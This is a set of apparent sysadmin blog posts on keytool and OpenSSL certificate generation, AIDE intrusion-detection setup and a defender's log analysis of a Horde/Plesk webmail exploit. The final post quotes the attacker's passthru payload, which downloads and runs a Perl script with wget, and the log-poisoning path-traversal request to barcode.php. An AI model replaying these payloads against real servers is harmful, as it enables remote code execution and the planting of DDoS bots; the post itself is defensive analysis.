The -rfc option means that the certificate will not be exported in binary form but as shown below.

The exported file looks like this:


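The exported -rfc file is plain Base64-wrapped PEM, so it can also be decoded without keytool, e.g. with openssl if you have it at hand. The sketch below generates a throwaway certificate first so it stands alone; with a real export you would point -in at your exported .cer file:

```shell
# Create a throwaway certificate so the example is self-contained
openssl req -x509 -newkey rsa:2048 -nodes -subj "/CN=ws_client" \
        -keyout /tmp/ws_client.key -out /tmp/ws_client.cer -days 3650
# Decode the PEM certificate and print its subject and expiry date
openssl x509 -in /tmp/ws_client.cer -noout -subject -enddate
```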
In order to get a certificate, you’ll have to provide the certifying authorities of the customer with a certificate request. This can be done using the keytool command like this:

$JAVA_HOME/bin/keytool -certreq -alias ws_client -file CSR_FILE_PATH -keypass YOUR_KEY_PASSWORD \
         -keystore PATH_TO_KEYSTORE/ws_client.keystore \
         -storepass YOUR_KEYSTORE_PASSWORD -J-Xmx256m

The certificate request file looks like this:


This certificate request file can then be sent to the person providing the certificate. Using this certificate request, he/she will generate a certificate which can then be imported this way:

$JAVA_HOME/bin/keytool -importcert -alias ws_client -file CER_FILE_PATH \
         -keystore PATH_TO_KEYSTORE/ws_client.keystore \
         -storepass YOUR_KEYSTORE_PASSWORD -J-Xmx256m 

You will need to answer yes when prompted whether you trust this certificate:

Owner:, OU=Blog, O=amazingweb GmbH, C=DE
Issuer:, OU=HenriCA, O=amazingweb GmbH, C=DE
Serial number: 534565a5
Valid from: Wed Apr 09 17:22:13 CEST 2014 until: Sat Apr 06 17:22:13 CEST 2024
Certificate fingerprints:
         MD5:  4A:B5:07:64:A3:FF:16:E4:B9:28:A3:D9:BE:9D:7D:E6
         SHA1: 69:C5:C9:9D:08:AE:17:37:2E:58:F6:77:C9:7B:59:59:E3:29:49:74
         Signature algorithm name: SHA1withRSA
         Version: 3
Trust this certificate? [no]:  yes
Certificate was added to keystore

Note that whether you use a self-generated certificate or one generated by a trusted CA, you will need to reference the keystore file and provide the keystore password in the configuration of your servlet container or application server (e.g. in jbossweb.sar/server.xml for JBoss).
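
For illustration, such a reference could look like the following connector entry in a Tomcat-style server.xml (a sketch with placeholder values; attribute names vary between container versions, so check your container’s documentation):

```xml
<!-- Hypothetical HTTPS connector; paths and passwords are placeholders -->
<Connector port="8443" protocol="HTTP/1.1" SSLEnabled="true"
           scheme="https" secure="true" sslProtocol="TLS"
           keystoreFile="PATH_TO_KEYSTORE/ws_client.keystore"
           keystorePass="YOUR_KEYSTORE_PASSWORD" />
```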

Generating new certificate in XAMPP for Windows

Since I had an older version of XAMPP for Windows installed, it was still using OpenSSL 1.0.1e, in which the Heartbleed vulnerability was not yet fixed. So I installed the latest version, and since the certificate in there was from 2013, I was not really sure whether it was safe, so I decided to generate a new one. Here’s a short description of how to do it.

Open a DOS prompt and navigate to the apache\bin directory in your XAMPP for Windows installation:

cd /D D:\Software\xampp\apache\bin

We’ll first define a couple of environment variables so that we do not need to provide them as parameters to openssl every time:

set OPENSSL_CONF=D:\Software\xampp\apache\conf\openssl.cnf
set RANDFILE=C:\Temp\.rnd

Now we’re ready to start. Generating a certificate involves 3 steps:

  1. Generating an RSA private key
  2. Generating a certificate signing request
  3. Generating a certificate

Note that since we are generating a self-signed certificate, we can combine these 3 steps into 1 as described here.

Once the certificate is generated you can install it as shown here.

Generating an RSA private key

You can generate the key by executing the following:

D:\Software\xampp\apache\bin>openssl genrsa -out server.key 1024
Loading 'screen' into random state - done
Generating RSA private key, 1024 bit long modulus
e is 65537 (0x10001)

This will create a file called server.key with a content similar to:


Note that you may find instructions saying to use the -des3 option. Do not do this, as it will cause your key to be protected by a pass phrase:

D:\Software\xampp\apache\bin>openssl genrsa -des3 -out server.key 1024
Loading 'screen' into random state - done
Generating RSA private key, 1024 bit long modulus
e is 65537 (0x10001)
Enter pass phrase for server.key:
Verifying - Enter pass phrase for server.key:

This will lead to the following error when XAMPP loads the key:

[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] AH02577: Init: SSLPassPhraseDialog builtin is not supported on Win32 (key file D:/Software/xampp/apache/conf/ssl.key/server.key)
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] AH02311: Fatal error initialising mod_ssl, exiting. See D:/Software/xampp/apache/logs/error.log for more information
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] AH02564: Failed to configure encrypted (?) private key localhost:8443:0, check D:/Software/xampp/apache/conf/ssl.key/server.key
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D08303A:asn1 encoding routines:ASN1_TEMPLATE_NOEXP_D2I:nested asn1 error
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error (Type=RSA)
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:04093004:rsa routines:OLD_RSA_PRIV_DECODE:RSA lib
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error (Type=PKCS8_PRIV_KEY_INFO)
AH00016: Configuration Failed

Generating a certificate signing request

You can then use the key to generate a certificate signing request using the following command:

D:\Software\xampp\apache\bin>openssl req -nodes -new -key server.key -out server.csr
Loading 'screen' into random state - done
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU]:.
State or Province Name (full name) [Some-State]:.
Locality Name (eg, city) []:.
Organization Name (eg, company) [Internet Widgits Pty Ltd]:localhost
Organizational Unit Name (eg, section) []:.
Common Name (e.g. server FQDN or YOUR name) []:localhost
Email Address []:.

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:mypassword
An optional company name []:.

You should of course use the appropriate data instead of localhost and the dot (which means an empty field). Also choose a challenge password other than mypassword.

This will create a file called server.csr containing something like:


You probably do not need the -nodes option since it only applies when using openssl to generate a key using the req command. But I’d rather use it here although I do not need it than forget it when generating both the key and the certificate in a single step using the req command.

Generating a certificate

Now we need to generate the certificate using the following:

D:\Software\xampp\apache\bin>openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
Loading 'screen' into random state - done
Signature ok
Getting Private key

If you get such an error:

unable to write 'random state'

it means you forgot to set the second environment variable (RANDFILE) as shown at the beginning of this post.

Generating a self-signed certificate in one step

When generating a self-signed certificate you can combine this all to one step using only the req command:

D:\Software\xampp\apache\bin>openssl req -nodes -new -x509 -keyout server.key -out server.crt
Loading 'screen' into random state - done
Generating a 1024 bit RSA private key
writing new private key to 'server.key'
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU]:.
State or Province Name (full name) [Some-State]:.
Locality Name (eg, city) []:.
Organization Name (eg, company) [Internet Widgits Pty Ltd]:localhost
Organizational Unit Name (eg, section) []:.
Common Name (e.g. server FQDN or YOUR name) []:localhost
Email Address []:.

You should of course use the appropriate data instead of localhost and the dot (which means an empty field).
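
Before installing the files, it does not hurt to check that the key and the certificate actually belong together by comparing their moduli. The sketch below generates a throwaway pair so it can be run as-is; on your XAMPP installation you would point both commands at the server.key and server.crt you just created:

```shell
# Generate a throwaway key/certificate pair for the demonstration
openssl req -x509 -newkey rsa:2048 -nodes -subj "/CN=localhost" \
        -keyout /tmp/server.key -out /tmp/server.crt -days 365
# The MD5 of the modulus must be identical for both files
CRT_MOD=$(openssl x509 -noout -modulus -in /tmp/server.crt | openssl md5)
KEY_MOD=$(openssl rsa -noout -modulus -in /tmp/server.key | openssl md5)
[ "$CRT_MOD" = "$KEY_MOD" ] && echo "key and certificate match"
```

If the two hashes differ, Apache would refuse to start the SSL virtual host anyway, so this saves a restart cycle.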

Installing the certificate

Now we just need to copy the key and the certificate to the apache installation:

D:\Software\xampp\apache\bin>copy /Y server.crt d:\Software\xampp\apache\conf\ssl.crt
        1 file(s) copied.

D:\Software\xampp\apache\bin>copy /Y server.key d:\Software\xampp\apache\conf\ssl.key
        1 file(s) copied.

After a restart of the Apache web server, your new certificate will be available.

Linux: Configure AIDE (Advanced Intrusion Detection Environment)

We upgraded our server to Debian Wheezy and Plesk 11.5 about a week ago and started getting many emails from cron. Luckily I had entered the email address of a colleague as administrator and he got the spam 😉

One of them was this one:

———- Forwarded message ———-
Date: 2013/9/16
Subject: Daily AIDE report for

This is an automated report generated by the Advanced Intrusion Detection
Environment on started at 2013-09-16 07:45:17.

* The cron job was terminated by a fatal error. *

* the cron job was interrupted before AIDE could return an exit code. *
* script errors *
Fatal error: The AIDE database ‘/var/lib/aide/aide.db’ does not exist!
This may mean you haven’t created it, or it may mean that someone has removed it.
End of script errors

AIDE produced no errors.

funny, AIDE did not leave a log.

End of AIDE daily cron job at 2013-09-16 07:45, run time 0 seconds

I didn’t know we had AIDE installed, but since it was there, it made sense to initialize it properly and see whether it works fine. For those of you who do not know AIDE: it is intrusion detection software which works by checking file and directory integrity. In order to work, AIDE first needs a database it can use to detect changes.

So the first step is to initialize the database. I found a nice article at HowToForge. It looked pretty easy, so I started with the first step, which was to download a sample configuration file:


And I got a 404 error:

–2013-09-16 20:32:46–
Resolving (…
Connecting to (||:80… connected.
HTTP request sent, awaiting response… 404 Not Found
2013-09-16 20:32:47 ERROR 404: Not Found.

Well… it starts fine… So I checked on Google whether I could find an alternative location but couldn’t find any. Then I thought that there must be some kind of configuration already available, since it was looking for the database at a specific path. So I checked the cron job sending us this nice email:

# grep "aide.conf" /etc/cron.daily/aide
# grep aide configuration data from aide config

Then opened /var/lib/aide/aide.conf.autogenerated to check the content and saw the following:

# this file is generated dynamically from /etc/aide/aide.conf and the files
# in /etc/aide/aide.conf.d
# Any changes you make here will be lost.

aide.conf as well as /etc/aide/aide.conf.d were there, and it looks like they were used to generate this file. So I just needed to create the database and could skip the wget part of the tutorial and go to the next step (Step 2: Initialize the AIDE database):

# nice -19 aide --init --config=/etc/aide/aide.conf

AIDE, version 0.15.1

### AIDE database at /var/lib/aide/ initialized.

It was pretty fast (you wish AIDE was actually that fast to initialize…). Then I checked whether AIDE was working properly:

# nice -19 aide -C --config=/etc/aide/aide.conf
Couldn't open file /var/lib/aide/aide.db for reading

Ok, this one is obvious: it has created a file and is actually looking for aide.db, so I just had to rename the file (well, I thought so, because the next step of the tutorial was “cp aide.db.out”):

# mv /var/lib/aide/ /var/lib/aide/aide.db
# nice -19 aide -C --config=/etc/aide/aide.conf
Database does not have attr field.
Comparation may be incorrect
Generating attr-field from dbspec
It might be a good Idea to regenerate databases. Sorry.
db_char2line():Error while reading database

OK, so the initialization was actually too fast and it didn’t generate a proper database… So after googling again, I found out you can initialize AIDE with the following:


It then runs forever using a CPU core at about 80% to 100%. It might display a few warnings like:

/run/lock/mailman/ mtime in future
/run/lock/mailman/master-qrunner mtime in future

But I wouldn’t worry about them.

Looking at the running processes, I could see that it actually caused an aide --init to be called, but with the auto-generated configuration file. Actually, I should have realized that this is the configuration file I should use, otherwise all rules are missing…

The initialization of AIDE took over an hour. I then made the second mistake: I immediately ran a check, got the same error, assumed that the created database was again not working and restarted an initialization. Only later did I realize that the problem was probably that it had created a new database and I needed to copy it to aide.db, otherwise the check would still run with the old database.

After the second initialization and copying the file, I didn’t get the same error again when running the check but a new one:

/usr/bin/aide --config /var/lib/aide/aide.conf.autogenerated -C
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification

The message is not 100% clear (does it mean it expected one and found none, or that it expected one and found two?). I thought it might have something to do with the second initialization. Maybe it did not reset the file but just appended to it… So I deleted both db files and tried again:

rm /var/lib/aide/ /var/lib/aide/aide.db
cp /var/lib/aide/ /var/lib/aide/aide.db
/usr/bin/aide --config /var/lib/aide/aide.conf.autogenerated --check

It then looked better and I actually got a list of differences. I now need to go through the list and also check what I need to add to the exclusion list and which other configuration options to set, to try to keep everything secure but avoid unnecessary spamming.

Plesk Exploit: Readable Logfile Vulnerability

A vulnerability scan was performed on one of our servers at the beginning of the month. It lasted about 4 days and was looking for vulnerable versions of the Plesk control panel in order to use the Horde/IMP Plesk Webmail Exploit. Let’s have a look at how this shows up in a few log files:

First the attacker is checking which version of Horde is installed:

- - [01/Jun/2013:15:05:42 +0200] "GET /horde/services/help/?show=about HTTP/1.1" 200 3326 "-" "HTTP_Request2/0.5.2 ( PHP/5.2.11"

If it finds a suitable version of Horde, it will go to the next steps:

- - [01/Jun/2013:15:38:39 +0200] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20091102 Firefox/3.5.5"

Here, the attacker sends a POST request to /horde/imp/redirect.php including some PHP code as the username. It usually uses the passthru PHP function, which executes an external program. The PHP code usually looks like this:

passthru('cd /tmp;wget http://xxx/yyy.txt;perl yyy.txt;rm -f yyy.txt');

It basically always does the same:

  1. Go to the tmp directory
  2. Download a PERL script
  3. Execute the script
  4. Delete the script

There are a few variations:

  • The commands are executed using passthru, system, shell_exec or exec
  • The script is downloaded using wget, curl, fetch, GET, lwp-download or lynx
  • The downloaded file is a file with the .txt extension or has an image file extension and is renamed before being executed
  • Sometimes, the attacker also messes with the history so that you do not see what exactly happened

There are even scripts which use many of the combinations above, just in case some of them do not work on a particular system.

This PHP code is written to the Horde log file. It is then executed by exploiting a vulnerability in barcode.php (or rather a vulnerability in Image.php, which is called by barcode.php). This looks like this:

- - [04/Jun/2013:15:38:41 +0200] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde.log%00 HTTP/1.1" 200 - "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20091102 Firefox/3.5.5"

It will most probably also try different log file locations, e.g.:

- - [04/Jun/2013:15:38:40 +0200] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 - "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20091102 Firefox/3.5.5"

In many cases, the Perl scripts will just install some additional Perl scripts used for DDoS attacks in your /var/www/vhosts/xxx/cgi-bin directories. You can find such scripts using:

find /var/www/vhosts/[a-z]*/cgi-bin/*.pl

In order to protect your system, you should always install all Plesk security updates. This vulnerability is very old but seems to be still worth exploiting. There is also a fix for Image.php which can be downloaded here.

Note that the Perl scripts stored in your vhost folders are often well commented and you will find comments like this one in there:

#part of the Gootkit ddos system

Nice, isn’t it ? 😉